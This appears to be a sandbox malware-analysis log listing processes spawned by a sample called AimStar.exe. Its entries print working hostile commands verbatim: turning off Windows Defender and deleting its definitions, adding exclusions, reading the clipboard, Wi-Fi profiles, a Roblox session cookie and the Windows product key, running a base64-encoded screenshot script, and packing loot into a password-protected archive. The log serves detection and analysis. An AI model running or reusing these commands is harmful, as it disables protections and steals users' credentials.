              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Users\user\Desktop\AimStar.exe "C:\Users\user\Desktop\AimStar.exe"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP"
